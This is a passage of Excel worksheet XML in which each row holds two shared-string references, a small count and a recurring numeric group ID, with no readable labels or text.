    <row r="14615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14615" t="s">
        <v>16230</v>
      </c>
      <c r="B14615" t="s">
        <v>16222</v>
      </c>
      <c r="C14615">
        <v>0</v>
      </c>
      <c r="D14615">
        <v>1805</v>
      </c>
    </row>
    <row r="14616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14616" t="s">
        <v>16223</v>
      </c>
      <c r="B14616" t="s">
        <v>16223</v>
      </c>
      <c r="C14616">
        <v>26</v>
      </c>
      <c r="D14616">
        <v>1805</v>
      </c>
    </row>
    <row r="14617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14617" t="s">
        <v>16224</v>
      </c>
      <c r="B14617" t="s">
        <v>16224</v>
      </c>
      <c r="C14617">
        <v>0</v>
      </c>
      <c r="D14617">
        <v>1805</v>
      </c>
    </row>
    <row r="14618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14618" t="s">
        <v>16228</v>
      </c>
      <c r="B14618" t="s">
        <v>16211</v>
      </c>
      <c r="C14618">
        <v>0</v>
      </c>
      <c r="D14618">
        <v>1311</v>
      </c>
    </row>
    <row r="14619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14619" t="s">
        <v>16231</v>
      </c>
      <c r="B14619" t="s">
        <v>16212</v>
      </c>
      <c r="C14619">
        <v>0</v>
      </c>
      <c r="D14619">
        <v>1311</v>
      </c>
    </row>
    <row r="14620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14620" t="s">
        <v>16228</v>
      </c>
      <c r="B14620" t="s">
        <v>16213</v>
      </c>
      <c r="C14620">
        <v>0</v>
      </c>
      <c r="D14620">
        <v>1311</v>
      </c>
    </row>
    <row r="14621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14621" t="s">
        <v>16231</v>
      </c>
      <c r="B14621" t="s">
        <v>16214</v>
      </c>
      <c r="C14621">
        <v>0</v>
      </c>
      <c r="D14621">
        <v>1311</v>
      </c>
    </row>
    <row r="14622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14622" t="s">
        <v>16228</v>
      </c>
      <c r="B14622" t="s">
        <v>16215</v>
      </c>
      <c r="C14622">
        <v>3</v>
      </c>
      <c r="D14622">
        <v>1311</v>
      </c>
    </row>
    <row r="14623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14623" t="s">
        <v>16231</v>
      </c>
      <c r="B14623" t="s">
        <v>16216</v>
      </c>
      <c r="C14623">
        <v>4</v>
      </c>
      <c r="D14623">
        <v>1311</v>
      </c>
    </row>
    <row r="14624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14624" t="s">
        <v>16228</v>
      </c>
      <c r="B14624" t="s">
        <v>16217</v>
      </c>
      <c r="C14624">
        <v>3</v>
      </c>
      <c r="D14624">
        <v>1311</v>
      </c>
    </row>
    <row r="14625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14625" t="s">
        <v>16231</v>
      </c>
      <c r="B14625" t="s">
        <v>16218</v>
      </c>
      <c r="C14625">
        <v>0</v>
      </c>
      <c r="D14625">
        <v>1311</v>
      </c>
    </row>
    <row r="14626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14626" t="s">
        <v>16229</v>
      </c>
      <c r="B14626" t="s">
        <v>16219</v>
      </c>
      <c r="C14626">
        <v>0</v>
      </c>
      <c r="D14626">
        <v>1311</v>
      </c>
    </row>
    <row r="14627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14627" t="s">
        <v>16230</v>
      </c>
      <c r="B14627" t="s">
        <v>16220</v>
      </c>
      <c r="C14627">
        <v>0</v>
      </c>
      <c r="D14627">
        <v>1311</v>
      </c>
    </row>
    <row r="14628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14628" t="s">
        <v>16229</v>
      </c>
      <c r="B14628" t="s">
        <v>16221</v>
      </c>
      <c r="C14628">
        <v>7</v>
      </c>
      <c r="D14628">
        <v>1311</v>
      </c>
    </row>
    <row r="14629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14629" t="s">
        <v>16230</v>
      </c>
      <c r="B14629" t="s">
        <v>16222</v>
      </c>
      <c r="C14629">
        <v>3</v>
      </c>
      <c r="D14629">
        <v>1311</v>
      </c>
    </row>
    <row r="14630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14630" t="s">
        <v>16223</v>
      </c>
      <c r="B14630" t="s">
        <v>16223</v>
      </c>
      <c r="C14630">
        <v>6</v>
      </c>
      <c r="D14630">
        <v>1311</v>
      </c>
    </row>
    <row r="14631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14631" t="s">
        <v>16224</v>
      </c>
      <c r="B14631" t="s">
        <v>16224</v>
      </c>
      <c r="C14631">
        <v>0</v>
      </c>
      <c r="D14631">
        <v>1311</v>
      </c>
    </row>
    <row r="14632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14632" t="s">
        <v>16228</v>
      </c>
      <c r="B14632" t="s">
        <v>16211</v>
      </c>
      <c r="C14632">
        <v>0</v>
      </c>
      <c r="D14632">
        <v>5057</v>
      </c>
    </row>
    <row r="14633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14633" t="s">
        <v>16231</v>
      </c>
      <c r="B14633" t="s">
        <v>16212</v>
      </c>
      <c r="C14633">
        <v>0</v>
      </c>
      <c r="D14633">
        <v>5057</v>
      </c>
    </row>
    <row r="14634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14634" t="s">
        <v>16228</v>
      </c>
      <c r="B14634" t="s">
        <v>16213</v>
      </c>
      <c r="C14634">
        <v>0</v>
      </c>
      <c r="D14634">
        <v>5057</v>
      </c>
    </row>
    <row r="14635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14635" t="s">
        <v>16231</v>
      </c>
      <c r="B14635" t="s">
        <v>16214</v>
      </c>
      <c r="C14635">
        <v>0</v>
      </c>
      <c r="D14635">
        <v>5057</v>
      </c>
    </row>
    <row r="14636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14636" t="s">
        <v>16228</v>
      </c>
      <c r="B14636" t="s">
        <v>16215</v>
      </c>
      <c r="C14636">
        <v>1</v>
      </c>
      <c r="D14636">
        <v>5057</v>
      </c>
    </row>
    <row r="14637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14637" t="s">
        <v>16231</v>
      </c>
      <c r="B14637" t="s">
        <v>16216</v>
      </c>
      <c r="C14637">
        <v>2</v>
      </c>
      <c r="D14637">
        <v>5057</v>
      </c>
    </row>
    <row r="14638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14638" t="s">
        <v>16228</v>
      </c>
      <c r="B14638" t="s">
        <v>16217</v>
      </c>
      <c r="C14638">
        <v>2</v>
      </c>
      <c r="D14638">
        <v>5057</v>
      </c>
    </row>
    <row r="14639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14639" t="s">
        <v>16231</v>
      </c>
      <c r="B14639" t="s">
        <v>16218</v>
      </c>
      <c r="C14639">
        <v>0</v>
      </c>
      <c r="D14639">
        <v>5057</v>
      </c>
    </row>
    <row r="14640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14640" t="s">
        <v>16229</v>
      </c>
      <c r="B14640" t="s">
        <v>16219</v>
      </c>
      <c r="C14640">
        <v>0</v>
      </c>
      <c r="D14640">
        <v>5057</v>
      </c>
    </row>
    <row r="14641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14641" t="s">
        <v>16230</v>
      </c>
      <c r="B14641" t="s">
        <v>16220</v>
      </c>
      <c r="C14641">
        <v>0</v>
      </c>
      <c r="D14641">
        <v>5057</v>
      </c>
    </row>
    <row r="14642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14642" t="s">
        <v>16229</v>
      </c>
      <c r="B14642" t="s">
        <v>16221</v>
      </c>
      <c r="C14642">
        <v>0</v>
      </c>
      <c r="D14642">
        <v>5057</v>
      </c>
    </row>
    <row r="14643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14643" t="s">
        <v>16230</v>
      </c>
      <c r="B14643" t="s">
        <v>16222</v>
      </c>
      <c r="C14643">
        <v>0</v>
      </c>
      <c r="D14643">
        <v>5057</v>
      </c>
    </row>
    <row r="14644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14644" t="s">
        <v>16223</v>
      </c>
      <c r="B14644" t="s">
        <v>16223</v>
      </c>
      <c r="C14644">
        <v>0</v>
      </c>
      <c r="D14644">
        <v>5057</v>
      </c>
    </row>
    <row r="14645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14645" t="s">
        <v>16224</v>
      </c>
      <c r="B14645" t="s">
        <v>16224</v>
      </c>
      <c r="C14645">
        <v>0</v>
      </c>
      <c r="D14645">
        <v>5057</v>
      </c>
    </row>
    <row r="14646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14646" t="s">
        <v>16228</v>
      </c>
      <c r="B14646" t="s">
        <v>16211</v>
      </c>
      <c r="C14646">
        <v>0</v>
      </c>
      <c r="D14646">
        <v>1969</v>
      </c>
    </row>
    <row r="14647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14647" t="s">
        <v>16231</v>
      </c>
      <c r="B14647" t="s">
        <v>16212</v>
      </c>
      <c r="C14647">
        <v>0</v>
      </c>
      <c r="D14647">
        <v>1969</v>
      </c>
    </row>
    <row r="14648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14648" t="s">
        <v>16228</v>
      </c>
      <c r="B14648" t="s">
        <v>16213</v>
      </c>
      <c r="C14648">
        <v>0</v>
      </c>
      <c r="D14648">
        <v>1969</v>
      </c>
    </row>
    <row r="14649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14649" t="s">
        <v>16231</v>
      </c>
      <c r="B14649" t="s">
        <v>16214</v>
      </c>
      <c r="C14649">
        <v>0</v>
      </c>
      <c r="D14649">
        <v>1969</v>
      </c>
    </row>
    <row r="14650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14650" t="s">
        <v>16228</v>
      </c>
      <c r="B14650" t="s">
        <v>16215</v>
      </c>
      <c r="C14650">
        <v>1</v>
      </c>
      <c r="D14650">
        <v>1969</v>
      </c>
    </row>
    <row r="14651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14651" t="s">
        <v>16231</v>
      </c>
      <c r="B14651" t="s">
        <v>16216</v>
      </c>
      <c r="C14651">
        <v>3</v>
      </c>
      <c r="D14651">
        <v>1969</v>
      </c>
    </row>
    <row r="14652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14652" t="s">
        <v>16228</v>
      </c>
      <c r="B14652" t="s">
        <v>16217</v>
      </c>
      <c r="C14652">
        <v>27</v>
      </c>
      <c r="D14652">
        <v>1969</v>
      </c>
    </row>
    <row r="14653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14653" t="s">
        <v>16231</v>
      </c>
      <c r="B14653" t="s">
        <v>16218</v>
      </c>
      <c r="C14653">
        <v>17</v>
      </c>
      <c r="D14653">
        <v>1969</v>
      </c>
    </row>
    <row r="14654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14654" t="s">
        <v>16229</v>
      </c>
      <c r="B14654" t="s">
        <v>16219</v>
      </c>
      <c r="C14654">
        <v>0</v>
      </c>
      <c r="D14654">
        <v>1969</v>
      </c>
    </row>
    <row r="14655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14655" t="s">
        <v>16230</v>
      </c>
      <c r="B14655" t="s">
        <v>16220</v>
      </c>
      <c r="C14655">
        <v>0</v>
      </c>
      <c r="D14655">
        <v>1969</v>
      </c>
    </row>
    <row r="14656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14656" t="s">
        <v>16229</v>
      </c>
      <c r="B14656" t="s">
        <v>16221</v>
      </c>
      <c r="C14656">
        <v>0</v>
      </c>
      <c r="D14656">
        <v>1969</v>
      </c>
    </row>
    <row r="14657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14657" t="s">
        <v>16230</v>
      </c>
      <c r="B14657" t="s">
        <v>16222</v>
      </c>
      <c r="C14657">
        <v>0</v>
      </c>
      <c r="D14657">
        <v>1969</v>
      </c>
    </row>
    <row r="14658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14658" t="s">
        <v>16223</v>
      </c>
      <c r="B14658" t="s">
        <v>16223</v>
      </c>
      <c r="C14658">
        <v>26</v>
      </c>
      <c r="D14658">
        <v>1969</v>
      </c>
    </row>
    <row r="14659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14659" t="s">
        <v>16224</v>
      </c>
      <c r="B14659" t="s">
        <v>16224</v>
      </c>
      <c r="C14659">
        <v>0</v>
      </c>
      <c r="D14659">
        <v>1969</v>
      </c>
    </row>
    <row r="14660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14660" t="s">
        <v>16228</v>
      </c>
      <c r="B14660" t="s">
        <v>16211</v>
      </c>
      <c r="C14660">
        <v>0</v>
      </c>
      <c r="D14660">
        <v>5069</v>
      </c>
    </row>
    <row r="14661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14661" t="s">
        <v>16231</v>
      </c>
      <c r="B14661" t="s">
        <v>16212</v>
      </c>
      <c r="C14661">
        <v>0</v>
      </c>
      <c r="D14661">
        <v>5069</v>
      </c>
    </row>
    <row r="14662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14662" t="s">
        <v>16228</v>
      </c>
      <c r="B14662" t="s">
        <v>16213</v>
      </c>
      <c r="C14662">
        <v>0</v>
      </c>
      <c r="D14662">
        <v>5069</v>
      </c>
    </row>
    <row r="14663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14663" t="s">
        <v>16231</v>
      </c>
      <c r="B14663" t="s">
        <v>16214</v>
      </c>
      <c r="C14663">
        <v>0</v>
      </c>
      <c r="D14663">
        <v>5069</v>
      </c>
    </row>
    <row r="14664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14664" t="s">
        <v>16228</v>
      </c>
      <c r="B14664" t="s">
        <v>16215</v>
      </c>
      <c r="C14664">
        <v>1</v>
      </c>
      <c r="D14664">
        <v>5069</v>
      </c>
    </row>
    <row r="14665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14665" t="s">
        <v>16231</v>
      </c>
      <c r="B14665" t="s">
        <v>16216</v>
      </c>
      <c r="C14665">
        <v>1</v>
      </c>
      <c r="D14665">
        <v>5069</v>
      </c>
    </row>
    <row r="14666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14666" t="s">
        <v>16228</v>
      </c>
      <c r="B14666" t="s">
        <v>16217</v>
      </c>
      <c r="C14666">
        <v>0</v>
      </c>
      <c r="D14666">
        <v>5069</v>
      </c>
    </row>
    <row r="14667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14667" t="s">
        <v>16231</v>
      </c>
      <c r="B14667" t="s">
        <v>16218</v>
      </c>
      <c r="C14667">
        <v>2</v>
      </c>
      <c r="D14667">
        <v>5069</v>
      </c>
    </row>
    <row r="14668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14668" t="s">
        <v>16229</v>
      </c>
      <c r="B14668" t="s">
        <v>16219</v>
      </c>
      <c r="C14668">
        <v>0</v>
      </c>
      <c r="D14668">
        <v>5069</v>
      </c>
    </row>
    <row r="14669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14669" t="s">
        <v>16230</v>
      </c>
      <c r="B14669" t="s">
        <v>16220</v>
      </c>
      <c r="C14669">
        <v>2</v>
      </c>
      <c r="D14669">
        <v>5069</v>
      </c>
    </row>
    <row r="14670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14670" t="s">
        <v>16229</v>
      </c>
      <c r="B14670" t="s">
        <v>16221</v>
      </c>
      <c r="C14670">
        <v>33</v>
      </c>
      <c r="D14670">
        <v>5069</v>
      </c>
    </row>
    <row r="14671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14671" t="s">
        <v>16230</v>
      </c>
      <c r="B14671" t="s">
        <v>16222</v>
      </c>
      <c r="C14671">
        <v>38</v>
      </c>
      <c r="D14671">
        <v>5069</v>
      </c>
    </row>
    <row r="14672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14672" t="s">
        <v>16223</v>
      </c>
      <c r="B14672" t="s">
        <v>16223</v>
      </c>
      <c r="C14672">
        <v>0</v>
      </c>
      <c r="D14672">
        <v>5069</v>
      </c>
    </row>
    <row r="14673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14673" t="s">
        <v>16224</v>
      </c>
      <c r="B14673" t="s">
        <v>16224</v>
      </c>
      <c r="C14673">
        <v>0</v>
      </c>
      <c r="D14673">
        <v>5069</v>
      </c>
    </row>
    <row r="14674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14674" t="s">
        <v>16228</v>
      </c>
      <c r="B14674" t="s">
        <v>16211</v>
      </c>
      <c r="C14674">
        <v>0</v>
      </c>
      <c r="D14674">
        <v>5171</v>
      </c>
    </row>
    <row r="14675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14675" t="s">
        <v>16231</v>
      </c>
      <c r="B14675" t="s">
        <v>16212</v>
      </c>
      <c r="C14675">
        <v>0</v>
      </c>
      <c r="D14675">
        <v>5171</v>
      </c>
    </row>
    <row r="14676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14676" t="s">
        <v>16228</v>
      </c>
      <c r="B14676" t="s">
        <v>16213</v>
      </c>
      <c r="C14676">
        <v>0</v>
      </c>
      <c r="D14676">
        <v>5171</v>
      </c>
    </row>
    <row r="14677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14677" t="s">
        <v>16231</v>
      </c>
      <c r="B14677" t="s">
        <v>16214</v>
      </c>
      <c r="C14677">
        <v>0</v>
      </c>
      <c r="D14677">
        <v>5171</v>
      </c>
    </row>
    <row r="14678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14678" t="s">
        <v>16228</v>
      </c>
      <c r="B14678" t="s">
        <v>16215</v>
      </c>
      <c r="C14678">
        <v>0</v>
      </c>
      <c r="D14678">
        <v>5171</v>
      </c>
    </row>
    <row r="14679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14679" t="s">
        <v>16231</v>
      </c>
      <c r="B14679" t="s">
        <v>16216</v>
      </c>
      <c r="C14679">
        <v>1</v>
      </c>
      <c r="D14679">
        <v>5171</v>
      </c>
    </row>
    <row r="14680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14680" t="s">
        <v>16228</v>
      </c>
      <c r="B14680" t="s">
        <v>16217</v>
      </c>
      <c r="C14680">
        <v>2</v>
      </c>
      <c r="D14680">
        <v>5171</v>
      </c>
    </row>
    <row r="14681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14681" t="s">
        <v>16231</v>
      </c>
      <c r="B14681" t="s">
        <v>16218</v>
      </c>
      <c r="C14681">
        <v>2</v>
      </c>
      <c r="D14681">
        <v>5171</v>
      </c>
    </row>
    <row r="14682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14682" t="s">
        <v>16229</v>
      </c>
      <c r="B14682" t="s">
        <v>16219</v>
      </c>
      <c r="C14682">
        <v>0</v>
      </c>
      <c r="D14682">
        <v>5171</v>
      </c>
    </row>
    <row r="14683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14683" t="s">
        <v>16230</v>
      </c>
      <c r="B14683" t="s">
        <v>16220</v>
      </c>
      <c r="C14683">
        <v>0</v>
      </c>
      <c r="D14683">
        <v>5171</v>
      </c>
    </row>
    <row r="14684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14684" t="s">
        <v>16229</v>
      </c>
      <c r="B14684" t="s">
        <v>16221</v>
      </c>
      <c r="C14684">
        <v>0</v>
      </c>
      <c r="D14684">
        <v>5171</v>
      </c>
    </row>
    <row r="14685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14685" t="s">
        <v>16230</v>
      </c>
      <c r="B14685" t="s">
        <v>16222</v>
      </c>
      <c r="C14685">
        <v>0</v>
      </c>
      <c r="D14685">
        <v>5171</v>
      </c>
    </row>
    <row r="14686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14686" t="s">
        <v>16223</v>
      </c>
      <c r="B14686" t="s">
        <v>16223</v>
      </c>
      <c r="C14686">
        <v>24</v>
      </c>
      <c r="D14686">
        <v>5171</v>
      </c>
    </row>
    <row r="14687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14687" t="s">
        <v>16224</v>
      </c>
      <c r="B14687" t="s">
        <v>16224</v>
      </c>
      <c r="C14687">
        <v>1</v>
      </c>
      <c r="D14687">
        <v>5171</v>
      </c>
    </row>
    <row r="14688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14688" t="s">
        <v>16228</v>
      </c>
      <c r="B14688" t="s">
        <v>16211</v>
      </c>
      <c r="C14688">
        <v>0</v>
      </c>
      <c r="D14688">
        <v>5219</v>
      </c>
    </row>
    <row r="14689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14689" t="s">
        <v>16231</v>
      </c>
      <c r="B14689" t="s">
        <v>16212</v>
      </c>
      <c r="C14689">
        <v>0</v>
      </c>
      <c r="D14689">
        <v>5219</v>
      </c>
    </row>
    <row r="14690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14690" t="s">
        <v>16228</v>
      </c>
      <c r="B14690" t="s">
        <v>16213</v>
      </c>
      <c r="C14690">
        <v>0</v>
      </c>
      <c r="D14690">
        <v>5219</v>
      </c>
    </row>
    <row r="14691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14691" t="s">
        <v>16231</v>
      </c>
      <c r="B14691" t="s">
        <v>16214</v>
      </c>
      <c r="C14691">
        <v>0</v>
      </c>
      <c r="D14691">
        <v>5219</v>
      </c>
    </row>
    <row r="14692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14692" t="s">
        <v>16228</v>
      </c>
      <c r="B14692" t="s">
        <v>16215</v>
      </c>
      <c r="C14692">
        <v>4</v>
      </c>
      <c r="D14692">
        <v>5219</v>
      </c>
    </row>
    <row r="14693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14693" t="s">
        <v>16231</v>
      </c>
      <c r="B14693" t="s">
        <v>16216</v>
      </c>
      <c r="C14693">
        <v>2</v>
      </c>
      <c r="D14693">
        <v>5219</v>
      </c>
    </row>
    <row r="14694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14694" t="s">
        <v>16228</v>
      </c>
      <c r="B14694" t="s">
        <v>16217</v>
      </c>
      <c r="C14694">
        <v>12</v>
      </c>
      <c r="D14694">
        <v>5219</v>
      </c>
    </row>
    <row r="14695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14695" t="s">
        <v>16231</v>
      </c>
      <c r="B14695" t="s">
        <v>16218</v>
      </c>
      <c r="C14695">
        <v>0</v>
      </c>
      <c r="D14695">
        <v>5219</v>
      </c>
    </row>
    <row r="14696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14696" t="s">
        <v>16229</v>
      </c>
      <c r="B14696" t="s">
        <v>16219</v>
      </c>
      <c r="C14696">
        <v>0</v>
      </c>
      <c r="D14696">
        <v>5219</v>
      </c>
    </row>
    <row r="14697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14697" t="s">
        <v>16230</v>
      </c>
      <c r="B14697" t="s">
        <v>16220</v>
      </c>
      <c r="C14697">
        <v>0</v>
      </c>
      <c r="D14697">
        <v>5219</v>
      </c>
    </row>
    <row r="14698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14698" t="s">
        <v>16229</v>
      </c>
      <c r="B14698" t="s">
        <v>16221</v>
      </c>
      <c r="C14698">
        <v>0</v>
      </c>
      <c r="D14698">
        <v>5219</v>
      </c>
    </row>
    <row r="14699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14699" t="s">
        <v>16230</v>
      </c>
      <c r="B14699" t="s">
        <v>16222</v>
      </c>
      <c r="C14699">
        <v>0</v>
      </c>
      <c r="D14699">
        <v>5219</v>
      </c>
    </row>
    <row r="14700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14700" t="s">
        <v>16223</v>
      </c>
      <c r="B14700" t="s">
        <v>16223</v>
      </c>
      <c r="C14700">
        <v>25</v>
      </c>
      <c r="D14700">
        <v>5219</v>
      </c>
    </row>
    <row r="14701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14701" t="s">
        <v>16224</v>
      </c>
      <c r="B14701" t="s">
        <v>16224</v>
      </c>
      <c r="C14701">
        <v>1</v>
      </c>
      <c r="D14701">
        <v>5219</v>
      </c>
    </row>
    <row r="14702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14702" t="s">
        <v>16228</v>
      </c>
      <c r="B14702" t="s">
        <v>16211</v>
      </c>
      <c r="C14702">
        <v>0</v>
      </c>
      <c r="D14702">
        <v>1213</v>
      </c>
    </row>
    <row r="14703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14703" t="s">
        <v>16231</v>
      </c>
      <c r="B14703" t="s">
        <v>16212</v>
      </c>
      <c r="C14703">
        <v>0</v>
      </c>
      <c r="D14703">
        <v>1213</v>
      </c>
    </row>
    <row r="14704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14704" t="s">
        <v>16228</v>
      </c>
      <c r="B14704" t="s">
        <v>16213</v>
      </c>
      <c r="C14704">
        <v>0</v>
      </c>
      <c r="D14704">
        <v>1213</v>
      </c>
    </row>
    <row r="14705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14705" t="s">
        <v>16231</v>
      </c>
      <c r="B14705" t="s">
        <v>16214</v>
      </c>
      <c r="C14705">
        <v>0</v>
      </c>
      <c r="D14705">
        <v>1213</v>
      </c>
    </row>
    <row r="14706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14706" t="s">
        <v>16228</v>
      </c>
      <c r="B14706" t="s">
        <v>16215</v>
      </c>
      <c r="C14706">
        <v>2</v>
      </c>
      <c r="D14706">
        <v>1213</v>
      </c>
    </row>
    <row r="14707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14707" t="s">
        <v>16231</v>
      </c>
      <c r="B14707" t="s">
        <v>16216</v>
      </c>
      <c r="C14707">
        <v>2</v>
      </c>
      <c r="D14707">
        <v>1213</v>
      </c>
    </row>
    <row r="14708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14708" t="s">
        <v>16228</v>
      </c>
      <c r="B14708" t="s">
        <v>16217</v>
      </c>
      <c r="C14708">
        <v>5</v>
      </c>
      <c r="D14708">
        <v>1213</v>
      </c>
    </row>
    <row r="14709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14709" t="s">
        <v>16231</v>
      </c>
      <c r="B14709" t="s">
        <v>16218</v>
      </c>
      <c r="C14709">
        <v>3</v>
      </c>
      <c r="D14709">
        <v>1213</v>
      </c>
    </row>
    <row r="14710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14710" t="s">
        <v>16229</v>
      </c>
      <c r="B14710" t="s">
        <v>16219</v>
      </c>
      <c r="C14710">
        <v>3</v>
      </c>
      <c r="D14710">
        <v>1213</v>
      </c>
    </row>
    <row r="14711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14711" t="s">
        <v>16230</v>
      </c>
      <c r="B14711" t="s">
        <v>16220</v>
      </c>
      <c r="C14711">
        <v>4</v>
      </c>
      <c r="D14711">
        <v>1213</v>
      </c>
    </row>
    <row r="14712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14712" t="s">
        <v>16229</v>
      </c>
      <c r="B14712" t="s">
        <v>16221</v>
      </c>
      <c r="C14712">
        <v>5</v>
      </c>
      <c r="D14712">
        <v>1213</v>
      </c>
    </row>
    <row r="14713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14713" t="s">
        <v>16230</v>
      </c>
      <c r="B14713" t="s">
        <v>16222</v>
      </c>
      <c r="C14713">
        <v>7</v>
      </c>
      <c r="D14713">
        <v>1213</v>
      </c>
    </row>
    <row r="14714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14714" t="s">
        <v>16223</v>
      </c>
      <c r="B14714" t="s">
        <v>16223</v>
      </c>
      <c r="C14714">
        <v>26</v>
      </c>
      <c r="D14714">
        <v>1213</v>
      </c>
    </row>
    <row r="14715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14715" t="s">
        <v>16224</v>
      </c>
      <c r="B14715" t="s">
        <v>16224</v>
      </c>
      <c r="C14715">
        <v>1</v>
      </c>
      <c r="D14715">
        <v>1213</v>
      </c>
    </row>
    <row r="14716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14716" t="s">
        <v>16228</v>
      </c>
      <c r="B14716" t="s">
        <v>16211</v>
      </c>
      <c r="C14716">
        <v>0</v>
      </c>
      <c r="D14716">
        <v>1195</v>
      </c>
    </row>
    <row r="14717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14717" t="s">
        <v>16231</v>
      </c>
      <c r="B14717" t="s">
        <v>16212</v>
      </c>
      <c r="C14717">
        <v>0</v>
      </c>
      <c r="D14717">
        <v>1195</v>
      </c>
    </row>
    <row r="14718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14718" t="s">
        <v>16228</v>
      </c>
      <c r="B14718" t="s">
        <v>16213</v>
      </c>
      <c r="C14718">
        <v>0</v>
      </c>
      <c r="D14718">
        <v>1195</v>
      </c>
    </row>
    <row r="14719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14719" t="s">
        <v>16231</v>
      </c>
      <c r="B14719" t="s">
        <v>16214</v>
      </c>
      <c r="C14719">
        <v>0</v>
      </c>
      <c r="D14719">
